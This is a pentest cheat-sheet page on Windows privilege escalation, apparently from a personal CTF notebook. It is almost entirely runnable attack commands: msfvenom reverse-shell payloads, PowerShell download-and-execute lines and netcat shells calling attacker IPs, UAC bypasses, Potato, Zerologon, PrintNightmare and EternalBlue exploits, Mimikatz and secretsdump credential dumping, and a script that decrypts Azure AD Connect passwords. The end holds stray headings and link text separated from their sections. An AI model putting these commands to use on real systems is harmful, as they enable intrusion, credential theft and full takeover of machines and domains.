Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  • 01. Common Tricks
  • 01.1 UAC Bypass
  • 01.2 If you have, in or can?
  • 01.3 Service / Registry Exploits
  • 02. Tools
  • 02.1 PowerUp
  • 02.2 PowerUpSQL
  • 02.3 Seatbelt
  • 02.4 SecretsDump
  • 03. Common Exploits
  • 03.0 JuicyPotatoNG (New)
  • 03.1 Juicy Potato (Abusing the golden privileges)
  • 03.2 RoguePotato (No more JuicyPotato? Old story, welcome RoguePotato!)
  • 03.3 MultiPotato
  • 03.4 PrintSpoofer
  • 03.5 Zerologon | CVE 2020-1472
  • 03.6 Fodhelper.exe - UAC Bypass
  • 03.7 Serviio Insecure File Permissions
  • 03.8 PrintNightmare
  • 03.9 EternalBlue (MS17-010)
  • 03.10 Windows-Exploit-Suggester WES-NG
  • 03.11 Windows Kernel Exploits
  • 04. Mimikatz
  1. Windows

PrivilageEsc Windows 👑

PreviousLateral MovementNextActive Directory / SMB

Last updated 2 years ago

01. Common Tricks

01.1 UAC Bypass

  • DLL Hijacking UAC Bypass. (SystemPropertiesAdvanced.exe) Click for more!

## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vuln?
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If is true; we are good to go!!

## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack

## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe 
### If you get any error saying "This operation requires an interactive window". 
### You should use any kind of C2 (Use GreatSCT/MSBuild to launch Meterpreter)        

## ------------------| Use with interactive shell
### Create payload and gain shell using following methord
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### migrate the process to explorer.exe
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe

01.2 If you have, in or can?

  • AlwaysInstallElevated check

## ------------------| How to check
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

## From the output that the registry named “AlwaysInstallElevated” exists 
## with a dword (REG_WORD) value of 0x1, 
## which means that the AlwaysInstallElevated policy is enabled.
## Any user can run msi file.

## ------------------| Exploit 
## Create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi > pw3n.msi      
## or
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi  


## Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i pw3n.msi
## /quiet = Suppress any messages to the user during installation
## /qn = No GUI
## /i = Regular (vs. administrative) installation
  • SeBackupPrivilege and SeRestorePrivilege has?

## ------------------| How to check is enabled
whoami /all | findstr "SeBackupPrivilege SeRestorePrivilege"

## ------------------| Copy those SYSTEM Hives to current directory
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

#### Then we need to copy Active Directory Domain Database also known as ntds.dit

## ------------------| Create diskshadow script on local 
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

## ------------------| Convert the script to Windows format and upload it.
unix2dos script.txt

## ------------------| Use Diskshadow to backup C drive
diskshadow.exe /s script.txt
## The entire file system can now be accessed via the E: drive
ls E:

## ------------------| Use robocopy to backup the E:\Windows\ntds\ntds.dit file.
robocopy /B E:\Windows\ntds\ .\ ntds.dit
# Then download all SAM, SYSTEM and NTDS.DIT file then you can use secretsdump.py to get admini hash   

## ------------------| Using wbadmin.exe
## Use archival smb on samba
## smb share and the share needs to be formated as NTFS/ReFS. follow below commands to do so.
dd if=/dev/zero of=ntfs.disk bs=320M count=2
losetup -fP ntfs.disk
losetup -a
mkfs.ntfs /dev/loop0
mount /dev/loop0 ./

echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit
  • If you has SeLoadDriverPrivilege ?

## ------------------| Download and upload following files to machine
wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe   
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe   

## ------------------| Create payload and upload
msfvenom  --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe  

## ------------------| Exploit
copy h4rithd.exe C:\Windows\Temp\h4rithd.exe # Must need, then start listner
.\ExploitCapcom.exe
  • If the user is in DnsAdmins group?

## ------------------| Create payload
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > h4rithd.dll   

## ------------------| Create SMB share on local machine 
impacket-smbserver share ./

## ------------------| Do this on owned remote box
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\<IP>\<Path-To-Dll-File>
sc.exe stop dns
## Create netcat listner and then 
sc.exe start dns
  • If you have GenericAll on user jorden

## ------------------| Enable PreAuth for user Jorden 
Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true

## ------------------| Then run this
impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass  
  • If you have GenericWrite on any services

## ------------------| Check the command
sc.exe 

## ------------------| If it is succcess then Exploit [Space must]
sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\""   
sc.exe stop UsoSVC 
sc.exe config UsoSVC start=auto
sc.exe start UsoSVC 
  • If you have xp_dirtree ?

## Turn on responder
sudo responder -i tun0

## Execute 
sqlcmd -Q "xp_dirtree \\YourIP\test"

## Get the NTLM hash and crack with 
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
  • If you are on Azure Admins group?

## Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/

## Methodology
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
  • If you are in member of Event Log Readers group.

wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1  
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1')

# Simple example showing the computer an event was generated on, the time, and any custom event data
Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_*  

# Find lockout events on a domain controller
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName     

#  Command line process login (A new process has been created)
Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap

## Check this out for windows event codes
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe                               

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d -accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate"               
.\SharpWSUS.exe approve /updateid:<ID> /computername:<HOSTNAME.DOMAIN> /groupname:"LocalUpdate"
### Wait for 5-6 minutes
.\SharpWSUS.exe check /updateid:<ID> /computername:<HOSTNAME.DOMAIN>
  • If you are member of Administrators group, but still stuck?

## List Administrators group members
net localgroup Administrators

## Use this simple methord to bypass UAC
net use h: \\127.0.0.1\c$
h:
dir 
  • If you are in LAPS_Readers

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\windows\temp\laps.csv" -NoTypeInformation
  • Hijacking/Migrating login sessions.

## ------------------| Check who are logged into the machine, what sessions are available?   
tasklist /v 

## ------------------| Get into a session
## Create payload 
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe   
sudo msfdb run 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT <PORT>
run
meterpreter > ps
## Search explorer.exe; becouse it's more stable then copy the PID value
migrate <PID>

01.3 Service / Registry Exploits

## ------------------| Enumarations [Must have SERVICE_START & SERVICE_STOP permissions]
.\winPEASany.exe quiet servicesinfo
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"     

## ------------------| Check Permissions
icacls "C:\Program Files\...\<PATH>\..\pro.exe"
### Check BUILTIN\Users:(I)(F) permission

## ------------------| Check for particular service name
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv user <service_name>
accesschk.exe /accepteula -ucqv <ServiceName>

## ------------------| Exploit
## Check current status
sc qc <service_name>
sc query <service_name>
## Set binary path
sc config <service_name> binpath= "\"C:\Windows\Temp\shell.exe\""
## Start service
net start <service_name> 
sc STOP <service_name>
sc START <service_name> 
## Set automactic start
sc config <service_name> start= auto
## Remove dependancy 
sc config <service_name> depend= ""

## ------------------| Restart service 
cmd
wmic service where caption="<ServiceName> get name, caption, state, startmode
## if StartMode is Auto
## Check if we have restart machine privilages
whoami /priv
  • Insecure Service Executables

## ------------------| Check 
### RW Everyone
.\accesschk.exe /accepteula -quvw "C:\<PATH>.exe"
### SERVICE_START & SERVICE_STOP permissions 
.\accesschk.exe /accepteula -uwcqv user <service_name>

## ------------------| Exploit
## Backup origianl one then replace with shell.exe
## Start the service
net start <service_name> 
sc STOP <service_name> 
sc START <service_name> 
## ------------------| Intro
C:\Program Files\One Folder\Two Folder\Executable.exe
C:\Program.exe
C:\Program Files\One.exe
C:\Program Files\One Folder\Two.exe
C:\Program Files\A Subfolder\Two Folder\Executable.exe

## ------------------| Check unqoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v "'"

## ------------------| Check if we have 
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
###  Write permission [RW BUILTIN\Users]
.\accesschk.exe /accepteula -uwcqv -uwdq <path>

## ------------------| Replace & start service
move payload.exe "C:\Program Files\...\<SUB DIR>\<SUB>.exe"
net start <service_name> 
sc STOP <service_name> 
sc START <service_name> 
  • Weak Registry Permissions

## ------------------| Verify [Check for RW NT AUTHORITY\INTERACTIVE]
Get-Acl HKLM:\<ServicePath>\<ServiceName> | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM:\<ServicePath>\<ServiceName> 

## ------------------| Check if we can start the service
.\accesschk.exe /accepteula -ucqv user <ServiceName>

## ------------------| Check Current values [ImagePath & ObjectName == LocalSystem]
reg query HKLM:\<ServicePath>\<ServiceName> 

## ------------------| Add new value
reg add HKLM:\<ServicePath>\<ServiceName> /v ImageaPath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f    
net start <service_name>                

02. Tools

## ------------------| Download and execute
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')" 

## ------------------| Best check
Invoke-AllChecks
CurrentUserTokenGroupSid 
Get-RegistryAutoLogon

## ------------------| Check other functions
cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}'
# Download 
wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1

# Upload 
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1')

# Execute commands
Get-SQLInstanceLocal -Verbose
Invoke-SQLUncPathInjection -Verbose
Invoke-SQLImpersonateService -Verbose
Invoke-SQLEscalatePriv -Verbose
$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSPython -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20     

02.3 Seatbelt

# Run ALL enumeration checks
Seatbelt.exe -group=all

02.4 SecretsDump

## ------------------| If you have SAM and SYSTEM files on your hand
impacket-secretsdump -sam SAM -system SYSTEM local

## ------------------| Remote
impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161

# 31d6cfe0d16ae931b73c59d7e0c089c0 <-- blank
# aad3b435b51404eeaad3b435b51404ee <-- blank [LM]

## ------------------| Remote NTDS
## Copy ntds file
robocopy /B C:\Windows\ntds .\ntds ntds.dit
## Copy sam and system file then run
impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local

## ------------------| Local NTDS
impacket-secretsdump -system ntds.bin -ntds ntds.dit local
## ntds.bin: MS Windows registry file, NT/2000 or above
## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1

03. Common Exploits

## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! 👌👌👌

## ------------------| Download to local machine
wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip                                                             
unzip JuicyPotatoNG.zip

## ------------------| After upload it on victim's machine create bat file
echo "powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==" > shell.bat
type C:\programdata\shell.bat

## ------------------| Run
.\JuicyPotatoNG.exe -t * -p <fullPath>\shell.bat
## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! 👌👌👌

## ------------------| Create .bat script
## Shell through Netcat 
echo START C:\<path>\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat
## Shell through Powershell 
cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')   

## ------------------| List CLSID's
.\JuicyPotato.exe -z -l 100

## ------------------| Execute 
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337  
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337  

## ------------------| General options
# Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both  
-p <program>: program to launch
-l <port>: COM server listen port

# Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
## ------------------| Run Chisel to bind port 9999
chisel server --reverse --port 1337 ## From Our end
.\chisel64.exe client <MyIP>:1337 R:9999:localhost:9999 ## From Attackers end

## ------------------| Run socat to catch 135 
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999 ## From Our end

## ------------------| Execute RoguePotato
.\RoguePotato.exe -r <MyIP> -e "powershell C:\Windows\Temp\rev.ps1" -l 9999
# or 
.\RoguePotato.exe -r <MyIP> -e "c:\windows\temp\h4rithd.exe" -l 9999
## ------------------| Download
### Bit 64
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe 
### Bit 32
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe     

## ------------------| BindShell with SpoolSample PipeName
.\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

## ------------------| CreateUser with modified PetitPotam trigger
.\Multipotato.exe -t CreateUser

## ------------------| CreateProcessAsUserW with SpoolSample trigger
.\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

03.4 PrintSpoofer

# !!! Microsoft Visual C++ Redistributable Must installed

.\PrintSpoofer.exe -i -c "C:\\<PATH>\shell.exe"
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179

# if exploit complte,
impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179

# Now you can login with this 
# '$' is used for machine account
impacket-psexec Administrator@10.10.10.179 -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0  
## ------------------| CMD
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ         
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f                 
C:\Windows\System32\fodhelper.exe

## ------------------| Powershell
$program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS=="
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

## ------------------| Remove
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

03.7 Serviio Insecure File Permissions

## ------------------| Enumarations
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio          
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F)

## ------------------| Exploit
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio 
## or 
wmic service where caption="Serviio" get name, caption, state,startmode
whoami /priv | findstr SeShutdownPrivilege ## Disabled OK
shutdown /r /t 0 
## ------------------| Verify vulnerability
impacket-rpcdump @<IP> | grep -A2 -B2 MS-RPRN 

## ------------------| Download and execute
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare 
## If you get any kind of errors like ExecutionPolicy; try with evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>  -s $(pwd)
CVE-2021-1675.ps1
menu
Invoke-Nightmare

## Then use psexec to login with new creds
impacket-psexec adm1n:'P@ssw0rd'@<IP>

03.9 EternalBlue (MS17-010)

## ------------------| Check
nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP

## ------------------| Setup
git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket pycrypto # This will get an error; that's fine
python checker.py <IP>
msfvenom -p windows/shell_reverse_tcp LHOST=<YourIP> LPORT=4545 -f exe > rev.exe

## ------------------| Method I
python send_and_execute.py <IP> rev.exe

## ------------------| Method II
## Open zzz_exploit.py file and edit following lines
service_exec(conn, r'cmd /c net user h4rithd Password123 /add')
service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add')
python zzz_exploit.py <IP>
## ------------------| Install
git clone https://github.com/bitsadmin/wesng.git
cd wesng
chmod +x wes.py

## ------------------| Download latest definitions
./wes.py --update
./wes.py -u

## ------------------| Download latest version of WES-NG
./wes.py --update-wes

## ------------------| Determine vulnerabilities
./wes.py systeminfo.txt

## ------------------| Determine vulnerabilities using both systeminfo and qfe files
./wes.py systeminfo.txt qfe.txt

## ------------------| Determine vulnerabilities and output to file
./wes.py systeminfo.txt --output vulns.csv
./wes.py systeminfo.txt -o vulns.csv

## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives
./wes.py systeminfo.txt --patches KB4345421 KB4487017
./wes.py systeminfo.txt -p KB4345421 KB4487017

## ------------------| Determine vulnerabilies filtering out out vulnerabilities of KBs that have been published before the publishing date of the most recent KB installed
./wes.py systeminfo.txt --usekbdate
./wes.py systeminfo.txt -d

## ------------------| Determine vulnerabilities explicitly specifying definitions file
./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip

## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash
./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash

## ------------------| Only show vulnerabilities of a certain impact
./wes.py systeminfo.txt --impact "Remote Code Execution"
./wes.py systeminfo.txt -i "Remote Code Execution"

## ------------------| Only show vulnerabilities of a certain severity
./wes.py systeminfo.txt --severity critical
./wes.py systeminfo.txt -s critical

## ------------------| Validate supersedence against Microsoft's online Update Catalog
./wes.py systeminfo.txt --muc-lookup

03.11 Windows Kernel Exploits

Microsoft Windows - Local Privilege Escalation (MS15-051)

wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip

USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)

## ------------------| Information
# Date             - 07th March 2017
# Discovered by    - Parvez Anwar (@parvezghh)
# Vendor Homepage  - http://desowin.org/usbpcap/ 
# Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
# Driver Version   - 1.1.0.0 - USBPcap.sys
# Tested on OS     - 32bit Windows 7 SP1 
# Vendor fix url   - not yet
# Fixed Version    - 0day
# Fixed driver ver - 0day

## ------------------| Check Vulnarable Version   
driverquery /v | findstr USBPcap.sys
type "C:\Program Files\USBPcap\USBPcap.inf"

## ------------------| Exploit
curl -o exploit.c https://www.exploit-db.com/raw/41542
gcc.exe -c exploit.exe exploit.c
./exploit.exe
  • Dump all user's ntlm hashes using lsass

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out 
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out       

## ------------------| If you have lsass as Mini DuMP or Rekall
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json
  • Set password for account

.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"
## ------------------| Get file's Certificate Thumbprint value
cipher /c c:\users\file.txt | Select-String "Certificate thumbprint"
## Also you can get this using following command.
dir C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name  

## ------------------| Getting the certificate
.\mimikatz.exe "crypto::system /file:C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<Certificate_Thumbprint> /export" "exit"    
## Download the *.der file to your machine.

## ------------------| Getting the masterkey
gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\
gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\<SID_VALUE>\
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\protect\<SID_VALUE>\<FileName> /password:<UserPassword>" "exit"     

## ------------------| Decrypting the private key
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\
.\mimikatz.exe "dpapi::capi /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE\<FILE> /masterkey:<SHA-1>" "exit"
## Download the *.pvk file to your machine.

## ------------------| Building & Installing the correct PFX
openssl x509 -inform DER -outform PEM -in *.der -out public.pem
openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:<NewPassword> -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx       
## Copy the cert.pfx file to remote machine.
certutil -user -p <NewPassword> -importpfx cert.pfx NoChain,NoRoot

## ------------------| Data access
type "c:\users\file.txt"

If you are on WSUS Administrators group?

02.1

03.0 (New)

03.1 (Abusing the golden privileges)

Click to view CLSIDs

03.2 ()

03.3

03.5

03.6

03.8

03.10

**Download all the Binary Files from : **

04.

More command available at

Decrypt EFS files. []

🪟
here
Check this article for more details.
SharpWSUS
Insecure Service Permissions
Unquoted Service Path
PowerUp
02.2 PowerUpSQL
Click here for cheatsheet!!
JuicyPotatoNG
Juicy Potato
here
RoguePotato
No more JuicyPotato? Old story, welcome RoguePotato!
MultiPotato
Zerologon | CVE 2020-1472
Fodhelper.exe - UAC Bypass
PrintNightmare
Windows-Exploit-Suggester WES-NG
https://github.com/SecWiki/windows-kernel-exploits
Mimikatz
here!
source